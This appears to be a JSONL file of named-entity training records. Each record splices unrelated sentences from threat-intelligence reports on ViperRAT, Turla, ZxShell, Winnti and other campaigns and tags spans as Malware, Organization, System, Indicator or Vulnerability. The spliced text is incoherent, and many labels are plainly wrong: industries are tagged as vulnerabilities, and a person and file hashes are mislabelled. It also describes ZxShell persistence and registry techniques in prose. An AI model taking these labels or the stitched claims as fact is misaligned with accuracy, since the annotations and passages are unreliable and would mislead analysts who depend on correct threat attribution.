{"text": "Given that this is an active threat , we \u2019 ve been working behind-the-scenes with our customers to ensure both personal and enterprise customers are protected from this threat and only decided to come forward with this information after the research team at Kaspersky released a report earlier today . WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private intelligence report \" Skipper Turla \u2013 the White Atlas framework \" from mid-2016 . Each value under this key represents a separate Svchost group and appears as a separate instance when you are viewing active processes . The videos were quickly passed around offices while users \u2019 systems were silently infected in the background , and many of the APT \u2019s components were signed with phony Intel and AMD digital certificates .", "spans": [{"start": 258, "end": 267, "label": "Organization"}, {"start": 302, "end": 311, "label": "System"}, {"start": 357, "end": 370, "label": "System"}, {"start": 443, "end": 456, "label": "System"}, {"start": 463, "end": 474, "label": "System"}, {"start": 551, "end": 558, "label": "System"}]}
{"text": "Additionally , we have determined that though original reports of this story attribute this surveillanceware tool to Hamas , this may not be the case , as we demonstrate below . However , despite the similarities to previous Turla campaigns , we believe that WhiteBear is a distinct project with a separate focus . Each value is a REG_MULTI_SZ value and contains the services that run under that Svchost group . A Microsoft Exchange server is composed of two major components : the frontend , also known as the Client Access Service , and the backend .", "spans": [{"start": 117, "end": 122, "label": "Organization"}, {"start": 259, "end": 268, "label": "System"}, {"start": 396, "end": 403, "label": "System"}, {"start": 414, "end": 432, "label": "System"}, {"start": 511, "end": 532, "label": "System"}]}
{"text": "The increasing sophistication of surveillanceware The structure of the surveillanceware indicates it is very sophisticated . From February to September 2016 , WhiteBear activity was narrowly focused on embassies and consular operations around the world . Each Svchost group can contain one or more service names that are extracted from the following registry key , whose Parameters key contains a ServiceDLL value : HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Service . The final payload of the July 2023 campaign is njRAT , which increases our confidence that the threat actor 's goals are information stealing and remote control of the targeted systems .", "spans": [{"start": 202, "end": 211, "label": "Organization"}, {"start": 260, "end": 267, "label": "System"}, {"start": 397, "end": 407, "label": "System"}, {"start": 526, "end": 531, "label": "Malware"}]}
{"text": "Analysis indicates there are currently two distinct variants of ViperRAT . Continued WhiteBear activity later shifted to include defense-related organizations into June 2017 . On a Windows machine , the netsvc group contains names of both existing and non-existing services . $ HOME / Library / LaunchAgents / com.studentd.agent.plist", "spans": [{"start": 64, "end": 72, "label": "Malware"}, {"start": 129, "end": 158, "label": "Organization"}, {"start": 181, "end": 188, "label": "System"}, {"start": 203, "end": 209, "label": "System"}, {"start": 276, "end": 334, "label": "Indicator"}]}
{"text": "The first variant is a \u201c first stage application , \u201d that performs basic profiling of a device , and under certain conditions attempts to download and install a much more comprehensive surveillanceware component , which is the second variant . All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations . ZxShell exploits this fact by cycling between each of the names , verifying the existence of the real service . Sometimes this was a high profile , legitimate site such as \u2018 diplomacy.pl \u2019 hosting a ZIP archive .", "spans": [{"start": 263, "end": 272, "label": "System"}, {"start": 297, "end": 306, "label": "Organization"}, {"start": 353, "end": 360, "label": "Malware"}, {"start": 486, "end": 563, "label": "Indicator"}]}
{"text": "The first variant involves social engineering the target into downloading a trojanized app . Thus , Turla operators had access to some highly sensitive information ( such as emails sent by the German Foreign Office staff ) for almost a year . The service \u2019s existence is verified with the ServiceExists function , which attempts to open the relative registry sub-key in HKLM\\SYSTEM\\CurrentControlSet\\Services . CrowdStrike incident responders found that renamed Plink and AnyDesk executable creation timestamps on affected backend Exchange servers were closely correlated with PowerShell execution events in the Remote PowerShell logs , indicating the threat actor leveraged the newly discovered exploit chain to drop other tooling for persistent access to the affected Exchange servers .", "spans": [{"start": 100, "end": 105, "label": "Organization"}, {"start": 193, "end": 220, "label": "Organization"}, {"start": 411, "end": 422, "label": "Organization"}]}
{"text": "Previous reports alleged this surveillanceware tool was deployed using \u2018 honey traps \u2019 where the actor behind it would reach out to targets via fake social media profiles of young women . Our investigation also led to the discovery of dozens of email addresses registered by Turla operators for this campaign and used to receive exfiltrated data from the victims . The first service name that is not installed on the system becomes the ZxShell service name . The MOVEit data breaches had widespread impacts , affecting everything from the Oregon DMV and Louisiana OMV ( Office of Motor Vehicles)\u2014including the leak of nearly 10 million drivers ' licenses \u2014 to the University of Rochester and multiple corporations .", "spans": [{"start": 436, "end": 443, "label": "Malware"}, {"start": 463, "end": 469, "label": "System"}, {"start": 539, "end": 549, "label": "Organization"}, {"start": 550, "end": 567, "label": "Organization"}, {"start": 664, "end": 687, "label": "Organization"}, {"start": 692, "end": 713, "label": "Organization"}]}
{"text": "After building an initial rapport with targets , the actors behind these social media accounts would instruct victims to install an additional app for easier communication . It mainly targets Microsoft Outlook , a widely used mail client , but also targets The Bat! , a mail client very popular in Eastern Europe . A new service is then created using the service parser function ProcessScCommand . None Read about adversaries tracked by CrowdStrike in 2021 in the and in the \u2022 None Learn more about how can help your organization prepare to defend against sophisticated threats , respond and recover from incidents with speed and precision , and fortify your cybersecurity practices .", "spans": [{"start": 437, "end": 448, "label": "Organization"}]}
{"text": "Specifically , Lookout determined these were trojanized versions of the apps SR Chat and YeeCall Pro . First , Turla steals emails by forwarding all outgoing emails to the attackers . ZxShell implemented its own version of the Windows B-TOOL S-OS SC command . The second step is simply the same exploit used in the second step of ProxyNotShell , allowing code execution through PowerShell remoting .", "spans": [{"start": 15, "end": 22, "label": "Organization"}, {"start": 77, "end": 84, "label": "System"}, {"start": 89, "end": 100, "label": "System"}, {"start": 111, "end": 116, "label": "Organization"}, {"start": 184, "end": 191, "label": "Malware"}, {"start": 330, "end": 343, "label": "Vulnerability"}, {"start": 346, "end": 397, "label": "Vulnerability"}]}
{"text": "We also uncovered ViperRAT in a billiards game , an Israeli Love Songs player , and a Move To iOS app . We identified several European governments and defense companies compromised with this group . There are minor differences between the ZxShell implementation of this command and the original Windows one . Figure 6 : \u201c lun.vbs \u201d contents", "spans": [{"start": 18, "end": 26, "label": "Malware"}, {"start": 94, "end": 97, "label": "System"}, {"start": 126, "end": 146, "label": "Organization"}, {"start": 151, "end": 168, "label": "Organization"}, {"start": 239, "end": 246, "label": "Malware"}, {"start": 295, "end": 302, "label": "System"}, {"start": 320, "end": 331, "label": "Indicator"}]}
{"text": "The second stage The second stage apps contain the surveillanceware capabilities . What actually happens is that the malware is able to decode data from the PDF documents and interpret it as commands for the backdoor . The installed service registry key is opened and the 2 values under its Parameter subkey are created . A great example is that of the notorious bank robber slick Willy Sutton .", "spans": [{"start": 157, "end": 170, "label": "System"}, {"start": 349, "end": 374, "label": "Organization"}, {"start": 381, "end": 393, "label": "Organization"}]}
{"text": "Lookout uncovered nine secondary payload applications : * These apps have not been previously reported and were discovered using data from the Lookout global sensor network , which collects app and device information from over 100 million sensors to provide researchers and customers with a holistic look at the mobile threat ecosystem today . In early 2018 , multiple media claimed that Turla operators used mail attachments to control infected machines . These 2 values , ServiceDll and ServiceDllUnloadOnStop are needed for services that run in a shared process . Postintrusion activities include lateral movement , as well as data collection and exfiltration via browserdata theft and a keylogger .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 143, "end": 150, "label": "Organization"}, {"start": 369, "end": 374, "label": "Organization"}, {"start": 474, "end": 484, "label": "System"}, {"start": 489, "end": 511, "label": "System"}]}
{"text": "Naming additional payload applications as system updates is a clever technique used by malware authors to trick victims into believing a threat isn \u2019 t present on their device . As detailed in the previous section , this malware is able to manipulate and exfiltrate emails . Before the service is started ChangeServiceConfig is called to modify the service type to shared and interactive . Open Babel allows users to \u201c search , convert , analyze , or store data from molecular modeling , chemistry , solid - state materials , biochemistry , or related areas , \u201d according to its website , and is used in other popular pieces of software in the science field .", "spans": [{"start": 240, "end": 272, "label": "Malware"}, {"start": 390, "end": 400, "label": "System"}]}
{"text": "ViperRAT takes this one step further by using its dropper app to identify an appropriate second stage \u2018 update \u2019 that may go unnoticed . To our knowledge , Turla is the only espionage group that currently uses a backdoor entirely controlled by emails , and more specifically via PDF attachments . If the service fails to start then a random service name formatted as netsvc_xxxxxxxx , where xxxxxxxx represent an 8-digit random hex value , is added to the netsvc group and the entire function is repeated . TIEDYE ( xpc.protect )", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 279, "end": 294, "label": "System"}, {"start": 456, "end": 462, "label": "System"}, {"start": 507, "end": 529, "label": "Malware"}]}
{"text": "For example , if a victim has Viber on their device , it will choose to retrieve the Viber Update second stage . The attackers first infected in March 2017 . This function is the entry point of the service . As nations committed to upholding the rules - based international order in cyberspace , the United States and its allies and partners are taking steps to defend against Russia \u2019s irresponsible actions .", "spans": [{"start": 30, "end": 35, "label": "System"}, {"start": 85, "end": 97, "label": "System"}, {"start": 296, "end": 313, "label": "Organization"}, {"start": 377, "end": 408, "label": "Organization"}]}
{"text": "If he doesn \u2019 t have Viber , the generically-named System Updates app gets downloaded and installed instead . Our research shows that compromised organizations are at risk of not only being spied on by the Turla group who planted the backdoor , but also by other attackers . It registers the service using the RegisterServiceCtrlHandler Windows API function . There is an apocryphal story about why he robbed banks .", "spans": [{"start": 337, "end": 344, "label": "System"}]}
{"text": "What was taken The actors behind ViperRAT seem to be particularly interested in image data . The developers refer to this tool by the name Kazuar , which is a Trojan written using the Microsoft.NET Framework that offers actors complete access to compromised systems targeted by its operator . The ZxShell service handler routine is only a stub : it responds to each service request code , doing nothing , and finally exits . Surprisingly enough , it does not take very long to get some information about Hack520 : someone with this handle runs a blog and a Twitter account ( with a handle close to Hack520 ) that is also directly linked to the blog .", "spans": [{"start": 33, "end": 41, "label": "Malware"}, {"start": 139, "end": 145, "label": "System"}, {"start": 297, "end": 304, "label": "Malware"}, {"start": 504, "end": 511, "label": "Organization"}, {"start": 598, "end": 605, "label": "Organization"}]}
{"text": "We were able to identify that 8,929 files had been exfiltrated from compromised devices and that the overwhelming majority of these , 97 percent , were highly likely encrypted images taken using the device camera . We suspect the Kazuar tool may be linked to the Turla threat actor group ( also known as Uroburos and Snake ) , who have been reported to have compromised embassies , defense contractors , educational institutions , and research organizations across the globe . It sets the service status to RUNNING and finally calls the ShellMain function of ZxShell . This campaign has a multi - stage attack chain that begins with a phishing email delivered to victims impersonating CoinPayments , a legitimate global cryptocurrency payment gateway .", "spans": [{"start": 230, "end": 241, "label": "System"}, {"start": 304, "end": 312, "label": "Organization"}, {"start": 317, "end": 322, "label": "Organization"}, {"start": 370, "end": 379, "label": "Organization"}, {"start": 382, "end": 401, "label": "Organization"}, {"start": 404, "end": 428, "label": "Organization"}, {"start": 435, "end": 457, "label": "Organization"}, {"start": 559, "end": 566, "label": "Malware"}]}
{"text": "We also observed automatically generated files on the C2 , indicating the actor behind this campaign also issues commands to search for and exfiltrate PDF and Office documents . This is also a full-featured backdoor controlled by email , and which can work independently of any other Turla component . The ShellMain function is a stub that relocates the DLL to another buffer and spawns a thread that starts from ShellMainThreadInt at offset +0xC0CD . Through this entry , in which we take a closer look at an individual who we believe might be connected to the Winnti group , we hope to give both ordinary users and organizations better insights into some of the tools \u2013 notably the server infrastructures- these kinds of threat actors use , as well as the scale in which they operate .", "spans": [{"start": 193, "end": 215, "label": "System"}, {"start": 354, "end": 357, "label": "System"}, {"start": 562, "end": 574, "label": "Organization"}, {"start": 598, "end": 612, "label": "Organization"}, {"start": 617, "end": 630, "label": "Organization"}, {"start": 684, "end": 707, "label": "System"}]}
{"text": "This should be highly alarming to any government agency or enterprise . A hallmark of Turla operations is iterations of their tools and code lineage in Kazuar can be traced back to at least 2005 . The ShellMainThreadInt function gets the HeapDestroy Windows API address and replaces the first 3 bytes with the RET 4 opcode . Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": [{"start": 152, "end": 158, "label": "System"}, {"start": 250, "end": 257, "label": "System"}, {"start": 365, "end": 412, "label": "Vulnerability"}]}
{"text": "We observed legitimate exfiltrated files of the following types of data : Contact information Compressed recorded audio in the Adaptive Multi-Rate ( amr ) file format Images captured from the device camera Images stored on both internal device and SDCard storage that are listed in the MediaStore Device geolocation information SMS content Chrome browser search history and bookmarks Call log information Cell tower information Device network metadata ; such as phone number , device software version , network country , network operator , SIM country , SIM operator , SIM serial , IMSI , voice mail number , phone If the hypothesis is correct and the Turla threat group is using Kazuar , we believe they may be using it as a replacement for Carbon and its derivatives . Subsequently , it calls the FreeLibrary function to free its own DLL buffer located at its original address . \u2022 new UK and US intelligence suggests Russia was behind an operation targeting commercial communications company Viasat in Ukraine \u2022 incident on 24 February caused outages for several thousand Ukrainian customers , and impacted windfarms and internet users in central Europe \u2022 cyber security leaders from the 5 Eyes , EU and other international allies meet at the NCSC \u2019s Cyber UK conference in Newport today to discuss shared threats Russia has been behind a series of cyber - attacks since the start of the renewed invasion of Ukraine , the EU , UK , US and other allies have announced today ( 10 May ) .", "spans": [{"start": 652, "end": 657, "label": "Organization"}, {"start": 680, "end": 686, "label": "System"}, {"start": 742, "end": 748, "label": "System"}, {"start": 836, "end": 839, "label": "System"}, {"start": 887, "end": 909, "label": "Organization"}, {"start": 919, "end": 925, "label": "Organization"}, {"start": 960, "end": 1000, "label": "Organization"}, {"start": 1109, "end": 1118, "label": "Organization"}, {"start": 1123, "end": 1137, "label": "Organization"}, {"start": 1158, "end": 1180, "label": "Organization"}, {"start": 1190, "end": 1196, "label": "Organization"}, {"start": 1199, "end": 1201, "label": "Organization"}, {"start": 1212, "end": 1232, "label": "Organization"}, {"start": 1245, "end": 1272, "label": "Organization"}, {"start": 1308, "end": 1322, "label": "Organization"}]}
{"text": "type , network type , data state , data activity , call state , SIM state , whether device is roaming , and if SMS is supported . We used a combination of tools such as NoFuserEx , ConfuserEx Fixer , ConfuserEx Switch Killer , and de4d0t in order to deobfuscate the code for in depth analysis . Because of this , the allocated heaps will not be freed . Anonymous Sudan appeared to be a core driver of claimed attacks targeting countries further afield , and it is primarily responsible for the recent surge of Israeli targeting ; however , nearly half of claimed Anonymous Sudan attacks still focused on U.S. or European organizations .", "spans": [{"start": 169, "end": 178, "label": "System"}, {"start": 181, "end": 197, "label": "System"}, {"start": 200, "end": 224, "label": "System"}, {"start": 231, "end": 237, "label": "System"}, {"start": 353, "end": 368, "label": "Organization"}, {"start": 563, "end": 586, "label": "Organization"}, {"start": 604, "end": 634, "label": "Organization"}]}
{"text": "Standard browser search history Standard browser bookmarks Device handset metadata ; such as brand , display , hardware , manufacturer , product , serial , radio version , and SDK . Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \" [username]=>singleton-instance-mutex \" . It re-copies the DLL from the new buffer to the original one using the memcpy function . CL0P used separate zero - days in GoAnywhere MFT and MOVEit Transfer to gain an edge .", "spans": [{"start": 182, "end": 188, "label": "Organization"}, {"start": 189, "end": 208, "label": "Malware"}, {"start": 340, "end": 343, "label": "System"}, {"start": 412, "end": 416, "label": "Organization"}, {"start": 422, "end": 442, "label": "Malware"}, {"start": 446, "end": 460, "label": "System"}, {"start": 465, "end": 480, "label": "System"}]}
{"text": "Command and control API calls ViperRAT samples are capable of communicating to C2 servers through an exposed API as well as websockets . The subject is a series of targeted attacks against private companies . Finally , it spawns the main thread that starts at the original location of ShellMainThread procedure , and terminates . In October 2019 , ESET published \u201c Operation Ghost \u201d detailing a set of new trojans used by the Dukes , including PolyglotDuke , RegDuke and FatDuke .", "spans": [{"start": 30, "end": 38, "label": "Malware"}, {"start": 189, "end": 206, "label": "Organization"}, {"start": 365, "end": 380, "label": "Organization"}, {"start": 426, "end": 431, "label": "Organization"}, {"start": 444, "end": 456, "label": "Malware"}, {"start": 459, "end": 466, "label": "Malware"}, {"start": 471, "end": 478, "label": "Malware"}]}
{"text": "Below is a collection of API methods and a brief description around their purpose . e uncovered the activity of a hacking group which has Chinese origins . At this point , the ZxShell library is no longer linked in the module list of the host process . In other highly successful runs , the actor sent out phony Flash videos directly as email attachments .", "spans": [{"start": 176, "end": 183, "label": "Malware"}]}
{"text": "On attribution Media reporting on ViperRAT thus far attributes this surveillanceware tool to Hamas . Also , by creating this type of API access , Turla could use one accessible server as a single point to dump data to and exfiltrate data from . This is important because if any system tool tries to open the host process it will never display the ZxShell DLL . None on the CrowdStrike Falcon \u00ae console and of the market - leading CrowdStrike Falcon \u00ae platform in action .", "spans": [{"start": 34, "end": 42, "label": "Malware"}, {"start": 93, "end": 98, "label": "Organization"}, {"start": 347, "end": 354, "label": "Malware"}, {"start": 355, "end": 358, "label": "System"}, {"start": 373, "end": 391, "label": "System"}, {"start": 430, "end": 448, "label": "System"}]}
{"text": "Israeli media published the first reports about the social networking and social engineering aspects of this campaign . According to our estimations , this group has been active for several years and specializes in cyberattacks against the online video game industry . This thread implements the main code , responsible for the entire botnet DLL . Up until now , we \u2019ve been relatively lucky \u2013 our most recent examples of social network - based cybercrime reveal threat actors using relatively mild motives ( monetization ) .", "spans": [{"start": 240, "end": 266, "label": "Organization"}, {"start": 335, "end": 341, "label": "Malware"}, {"start": 342, "end": 345, "label": "System"}, {"start": 463, "end": 476, "label": "Organization"}]}
{"text": "However it \u2019 s unclear whether organizations that later reported on ViperRAT performed their own independent research or simply based their content on the original Israeli report . Based on our analysis , we believe that threat actors may compile Windows and Unix based payloads using the same code to deploy Kazuar against both platforms . First , it checks if the DLL is executed as a service . Adversaries may utilize command - line interfaces ( CLIs ) to interact with systems and execute commands .", "spans": [{"start": 68, "end": 76, "label": "Malware"}, {"start": 309, "end": 315, "label": "Organization"}, {"start": 366, "end": 369, "label": "System"}]}
{"text": "Hamas is not widely known for having a sophisticated mobile capability , which makes it unlikely they are directly responsible for ViperRAT . The group 's main objective is to steal source codes . If so , it spawns the service watchdog thread . Wall to Wall reached out in July 2022 about collaborating with Bullock after KrebsOnSecurity published A Retrospective on the 2015 Ashley Madison Breach .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 131, "end": 139, "label": "Malware"}, {"start": 227, "end": 235, "label": "System"}, {"start": 245, "end": 257, "label": "Organization"}, {"start": 308, "end": 315, "label": "Organization"}, {"start": 322, "end": 337, "label": "Organization"}, {"start": 376, "end": 397, "label": "Organization"}]}
{"text": "ViperRAT has been operational for quite some time , with what appears to be a test application that surfaced in late 2015 . In 2010 HBGary investigated an information security incident related to the Winnti group at one of HBGary 's customers \u2013 an American video game company . The watchdog thread checks the registry path of the ZxShell service every 2 seconds , to verify that it has n\u2019t been modified . What the team uncovered was that the former MiniDuke attackers were still active , and using extremely effective social engineering techniques involving sending malicious PDF documents to compromise their victims .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 132, "end": 138, "label": "Organization"}, {"start": 223, "end": 229, "label": "Organization"}, {"start": 248, "end": 275, "label": "Organization"}, {"start": 282, "end": 290, "label": "System"}, {"start": 330, "end": 337, "label": "Malware"}, {"start": 439, "end": 468, "label": "Organization"}]}
{"text": "Many of the default strings in this application are in Arabic , including the name . In 2010 US-based HBGary investigated an information security incident related to the Winnti group at one of HBGary 's customers \u2013 an American video game company . If a user or an application modifies the ZxShell service registry key , the code restores the original infected service key and values . The majority of the Excel campaigns show some element of luring the user to enable macros in Excel with specific content using Ukrainian language .", "spans": [{"start": 102, "end": 108, "label": "Organization"}, {"start": 193, "end": 199, "label": "Organization"}, {"start": 227, "end": 245, "label": "Organization"}, {"start": 289, "end": 296, "label": "Malware"}, {"start": 401, "end": 420, "label": "Organization"}]}
{"text": "It is unclear whether this means early samples were targeting Arabic speakers or if the developers behind it are fluent in Arabic . For a long time the Winnti group had been considered as a Chinese threat actor targeting gaming companies specifically . The buffer containing the ZxShell Dll in the new location is freed using the VirtualFree API function . FREEFIRE communicates to a hard - coded channel to retrieve commands and upload responses .", "spans": [{"start": 152, "end": 164, "label": "Organization"}, {"start": 221, "end": 237, "label": "Organization"}, {"start": 279, "end": 286, "label": "Malware"}, {"start": 287, "end": 290, "label": "System"}, {"start": 357, "end": 365, "label": "Malware"}]}
{"text": "This leads us to believe this is another actor . In April Novetta released its excellent report on the Winnti malware spotted in the operations of Axiom group . A handle to the DLL file is taken in order to make its deletion more difficult . None Read about adversaries tracked by CrowdStrike in 2021 in the and in the \u2022 None Learn more about how can help your organization prepare to defend against sophisticated threats , respond and recover from incidents with speed and precision , and fortify your cybersecurity practices .", "spans": [{"start": 58, "end": 65, "label": "Organization"}, {"start": 103, "end": 117, "label": "System"}, {"start": 177, "end": 180, "label": "System"}, {"start": 281, "end": 292, "label": "Organization"}]}
{"text": "What this means for you All Lookout customers are protected from this threat . The Axiom group has been presented as an advanced Chinese threat actor carrying out cyber-espionage attacks against a whole range of different industries . The ZxShell mutex is created named @_ZXSHELL_@ . The file c018c54eff8fd0b9be50b5d419d80f21 ( r3_iec104_control.py ) imports the \" iec104_mssql_lib \" module , which is contained within the extracted contents as adfa40d44a58e1bc909abca444f7f616 ( iec104_mssql_lib.pyc ): 2b86adb6afdfa9216ef8ec2ff4fd2558 ( iec104_mssql_lib.py ) implements PIEHOP \u2019s primary capabilities and contains many developer - supplied comments for the included code .", "spans": [{"start": 28, "end": 35, "label": "Organization"}, {"start": 83, "end": 88, "label": "Organization"}, {"start": 239, "end": 246, "label": "System"}, {"start": 284, "end": 558, "label": "Malware"}, {"start": 572, "end": 581, "label": "Malware"}, {"start": 607, "end": 672, "label": "Indicator"}]}
{"text": "However , the existence of threats like ViperRAT and Pegasus , the most sophisticated piece of mobile surveillanceware we \u2019 ve seen to date , are evidence that attackers are targeting mobile devices . this library includes two drivers compiled on August 22 and September 4 , 2014 . ZxShell plugins are parsed and loaded with the AnalyseAndLoadPlugins function . OilRig uses two initial access vectors spearphishing and through ITbrain , which is a remote administration software , used in conjunction with the remote access tool TeamViewer .", "spans": [{"start": 40, "end": 48, "label": "Malware"}, {"start": 53, "end": 60, "label": "Malware"}, {"start": 282, "end": 289, "label": "Malware"}, {"start": 362, "end": 368, "label": "Organization"}, {"start": 427, "end": 434, "label": "System"}, {"start": 529, "end": 539, "label": "System"}]}
{"text": "Mobile devices are at the frontier of cyber espionage , and other criminal motives . Also our visibility as a vendor does not cover every company in the world ( at least so far ; ) ) and the Kaspersky Security Network ( KSN ) did not reveal other attacks except those against gaming companies . The plugin registry key HKLM\\SYSTEM\\CurrentControlSet\\Control\\zxplug is opened and each value is queried . RA Group , in its ongoing campaigns , has targeted the U.S. , South Korea , Taiwan , the U.K. and India across several business verticals , including manufacturing , wealth management , insurance providers , pharmaceuticals and financial management consulting companies .", "spans": [{"start": 191, "end": 217, "label": "Organization"}, {"start": 220, "end": 223, "label": "Organization"}, {"start": 276, "end": 292, "label": "Organization"}, {"start": 402, "end": 410, "label": "Organization"}, {"start": 453, "end": 461, "label": "Organization"}, {"start": 464, "end": 475, "label": "Organization"}, {"start": 478, "end": 484, "label": "Organization"}, {"start": 491, "end": 495, "label": "Organization"}, {"start": 500, "end": 505, "label": "Organization"}, {"start": 521, "end": 539, "label": "Vulnerability"}, {"start": 552, "end": 565, "label": "Vulnerability"}, {"start": 568, "end": 585, "label": "Vulnerability"}, {"start": 588, "end": 607, "label": "Vulnerability"}, {"start": 610, "end": 671, "label": "Vulnerability"}]}
{"text": "Enterprise and government employees all use these devices in their day-to-day work , which means IT and security leaders within these organizations must prioritize mobile in their security strategies . Conversely , LokiBot and Agent Tesla are new malware tools . The registry value contains the plugin file name . This can lead to a ransom situation where hackers demand money from the company in exchange for not releasing their data onto the internet or for unlocking their systems .", "spans": [{"start": 215, "end": 222, "label": "System"}, {"start": 227, "end": 238, "label": "System"}]}
{"text": "Check Point researchers discovered another widespread malware campaign on Google Play , Google \u2019 s official app store . Based on multiple active compromises by the Axiom threat group , Novetta was able to capture and analyze new Winnti malware samples . The target file is loaded using the LoadLibrary API function , and the address of the exported function zxMain is obtained with GetProcAddress . Ransomware gangs are consistently rebranding or merging with other groups , as highlighted in our 2022 Year in Review , or these actors work for multiple ransomware - as - a - service ( RaaS ) outfits at a time , and new groups are always emerging .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 74, "end": 85, "label": "System"}, {"start": 88, "end": 94, "label": "Organization"}, {"start": 185, "end": 192, "label": "Organization"}, {"start": 229, "end": 251, "label": "System"}, {"start": 553, "end": 591, "label": "Malware"}]}
{"text": "The malware , dubbed \u201c Judy \u201d , is an auto-clicking adware which was found on 41 apps developed by a Korean company . Initial attack targets are commonly software and gaming organizations in United States , Japan , South Korea , and China . If the target filename is incorrect or invalid the plugin file is deleted and the registry value is erased . First , the discovery of new OT malware presents an immediate threat to affected organizations , since these discoveries are rare and because the malware principally takes advantage of insecure by design features of OT environments that are unlikely to be remedied any time soon .", "spans": [{"start": 23, "end": 27, "label": "Malware"}, {"start": 167, "end": 187, "label": "Organization"}, {"start": 379, "end": 389, "label": "Malware"}]}
{"text": "The malware uses infected devices to generate large amounts of fraudulent clicks on advertisements , generating revenues for the perpetrators behind it . Initial attack targets are commonly software and gaming organizations in United States , Japan , South Korea , and China . That is performed by the function DeleteAndLogPlugin . Using differential firmware analysis , we identified the vulnerable endpoint and developed a PoC to validate the vulnerability .", "spans": [{"start": 203, "end": 223, "label": "Organization"}, {"start": 385, "end": 460, "label": "Indicator"}]}
{"text": "The malicious apps reached an astonishing spread between 4.5 million and 18.5 million downloads . The samples Novetta obtained from the active Axiom infection were compiled in mid- to late 2014 and represent what Novetta is referring to as version 3.0 of the Winnti lineage . Otherwise , the plugin is added to an internal list . The directory choices and naming conventions of the Ruby script and second stage payloads indicated the threat actor placed significant priority into masquerading as legitimate files and applications .", "spans": [{"start": 110, "end": 117, "label": "Organization"}, {"start": 213, "end": 220, "label": "Organization"}, {"start": 259, "end": 265, "label": "Organization"}, {"start": 382, "end": 393, "label": "Malware"}, {"start": 398, "end": 419, "label": "Malware"}, {"start": 430, "end": 531, "label": "Indicator"}]}
{"text": "Some of the apps we discovered resided on Google Play for several years , but all were recently updated . We assess with high confidence that the Winnti umbrella is associated with the Chinese state intelligence apparatus , with at least some elements located in the Xicheng District of Beijing . The thread KeyloggerThread is spawned and is responsible for doing keylogging on the target workstation . None Use of Python for malware development and/or packaging : We expect to continue to observe attackers compiling or packaging their OT malware via methods such as PyInstaller ( IRONGATE ) or Py2Exe ( TRITON ) given the proliferation of OT malware developed or packaged using Python in recent years .", "spans": [{"start": 42, "end": 53, "label": "System"}, {"start": 308, "end": 323, "label": "Organization"}, {"start": 415, "end": 421, "label": "System"}, {"start": 498, "end": 507, "label": "Organization"}, {"start": 537, "end": 547, "label": "Malware"}, {"start": 568, "end": 579, "label": "System"}, {"start": 582, "end": 590, "label": "Malware"}, {"start": 596, "end": 602, "label": "System"}, {"start": 605, "end": 611, "label": "Malware"}, {"start": 641, "end": 651, "label": "Malware"}, {"start": 680, "end": 686, "label": "System"}]}
{"text": "It is unclear how long the malicious code existed inside the apps , hence the actual spread of the malware remains unknown . The Winnti umbrella continues to operate highly successfully in 2018 . We will take a look at the keylogger later on . Enable robust application logging for MicroSCADA and aggregate logs to a central location .", "spans": [{"start": 223, "end": 232, "label": "System"}]}
{"text": "We also found several apps containing the malware , which were developed by other developers on Google Play . The Winnti umbrella and closely associated entities has been active since at least 2009 . Finally the main network communication function GetIpListAndConnect is called . The strings are obfuscated using the stack and simple Bitwise operation .", "spans": [{"start": 96, "end": 107, "label": "System"}, {"start": 280, "end": 291, "label": "System"}]}
{"text": "The connection between the two campaigns remains unclear , and it is possible that one borrowed code from the other , knowingly or unknowingly . The Winnti and Axiom group names were created by Kaspersky Lab and Symantec , respectively , for their 2013/2014 reports on the original group . This function is at the core of the RAT \u2019s network communication . Other interesting anomalies in June include 47 attacks on the Manufacturing industry ( which usually averages around 20 attacks a month ) and notable increases in attacks on Switzerland ( 14 ) and Brazil ( 13 ) , both of which are normally attacked only two or three times a month .", "spans": [{"start": 149, "end": 155, "label": "Organization"}, {"start": 166, "end": 171, "label": "Organization"}, {"start": 194, "end": 207, "label": "Organization"}, {"start": 212, "end": 220, "label": "Organization"}, {"start": 326, "end": 329, "label": "System"}, {"start": 419, "end": 441, "label": "Organization"}]}
{"text": "The oldest app of the second campaign was last updated in April 2016 , meaning that the malicious code hid for a long time on the Play store undetected . Their operations against gaming and technology organizations are believed to be economically motivated in nature . It starts by initializing a random number generator and reading 100 bytes inside the ZxShell Dll at a hardcoded location . Using tools that are more lightweight and generic than those observed in prior OT incidents , the actor likely decreased the time and resources required to conduct a cyber physical attack .", "spans": [{"start": 130, "end": 140, "label": "System"}, {"start": 179, "end": 185, "label": "Organization"}, {"start": 190, "end": 214, "label": "Organization"}, {"start": 354, "end": 361, "label": "Malware"}, {"start": 362, "end": 365, "label": "System"}]}
{"text": "These apps also had a large amount of downloads between 4 and 18 million , meaning the total spread of the malware may have reached between 8.5 and 36.5 million users . However , based on the findings shared in this report we assess with high confidence that the actor 's primary long-term mission is politically focused . These bytes are XOR encrypted with the byte-key 0x85 and contains a list of remote hosts where to connect . If you can not apply the KB5019758 patch immediately , you should disable OWA until the patch can be applied .", "spans": []}
{"text": "Similar to previous malware which infiltrated Google Play , such as FalseGuide and Skinner , Judy relies on the communication with its Command and Control server ( C & C ) for its operation . The Winnti umbrella and linked groups' initial targets are gaming studios and high tech businesses . The data is decrypted , the remote host list is parsed and verified using the BuildTargetIpListStruct function . So , when LockBit , the most active ransomware group in the world , is hitting three times as many victims as the next most active gang , you need to know how to prepare .", "spans": [{"start": 46, "end": 57, "label": "System"}, {"start": 68, "end": 78, "label": "Malware"}, {"start": 83, "end": 90, "label": "Malware"}, {"start": 251, "end": 265, "label": "Organization"}, {"start": 270, "end": 290, "label": "Organization"}, {"start": 416, "end": 423, "label": "Organization"}, {"start": 442, "end": 458, "label": "Organization"}]}
